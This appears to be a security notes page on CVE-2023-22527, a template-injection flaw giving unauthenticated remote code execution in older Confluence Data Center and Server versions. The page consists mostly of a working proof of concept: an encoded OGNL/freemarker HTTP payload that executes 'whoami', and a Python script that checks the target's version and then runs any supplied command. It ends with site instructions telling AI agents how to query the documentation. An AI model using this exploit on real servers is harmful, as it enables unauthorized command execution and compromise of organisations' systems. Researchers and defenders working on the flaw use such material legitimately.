# Confluence - CVE-2023-22527
A template injection vulnerability on older versions of **Confluence Data Center and Server** allows an unauthenticated attacker to achieve **remote code execution** on an affected instance.
Affected Versions:
* 8.0.x
* 8.2.x
* 8.3.x
* 8.4.x
* 8.5.0-8.5.3
## POC
Simple one-liner usable with Burp. RCE response is seen in header **X-Cmd-Response**.
```http
POST /template/aui/text-inline.vm HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29
```
Python script to simplify the process:
```python
import argparse
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
def get_confluence_version(target):
parsed_url = urlparse(target)
url = f"http://{parsed_url.netloc}/"
try:
response = requests.get(url)
response.raise_for_status()
soup = BeautifulSoup(response.text, 'html.parser')
version_span = soup.find('span', {'id': 'footer-build-information'})
if version_span:
confluence_version = version_span.text.strip()
return confluence_version
except requests.exceptions.RequestException as e:
print(f"Error: {e}")
return None
def check_exploitable_version(version):
exploitable_versions = ['8.0.', '8.1.', '8.2.', '8.3.', '8.4.', '8.5.0', '8.5.1', '8.5.2', '8.5.3']
for exploitable_version in exploitable_versions:
if version.startswith(exploitable_version):
return True
return False
def exploit(target, cmd):
confluence_version = get_confluence_version(target)
if confluence_version:
print(f"Confluence version: {confluence_version}")
if check_exploitable_version(confluence_version):
url = f"{target}/template/aui/text-inline.vm"
http_proxy = "http://127.0.0.1:8080"
https_proxy = "http://127.0.0.1:8080"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = r"label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'"+ cmd +"'}))"
response = requests.post(url, headers=headers, data=data, verify=False)
if (response.headers.get("X-Cmd-Response")):
print("Command Output:")
print(response.headers.get("X-Cmd-Response"))
else:
print("No response")
else:
print("The version cannot exploit the exploit")
else:
print("Unable to determine version of Confluence")
def main():
parser = argparse.ArgumentParser(
description="Send request with target and cmd parameters",
usage="python3 CVE-2023-22527.py --target --cmd \nExample: python3 CVE-2023-22527.py --target http://192.168.139.202 --cmd \"whoami\""
)
parser.add_argument("--target", required=True, help="Target address without http://")
parser.add_argument("--cmd", required=True, help="Value for the cmd parameter")
args = parser.parse_args()
exploit(args.target, args.cmd)
if __name__ == "__main__":
main()
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/confluence-cve-2023-22527.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.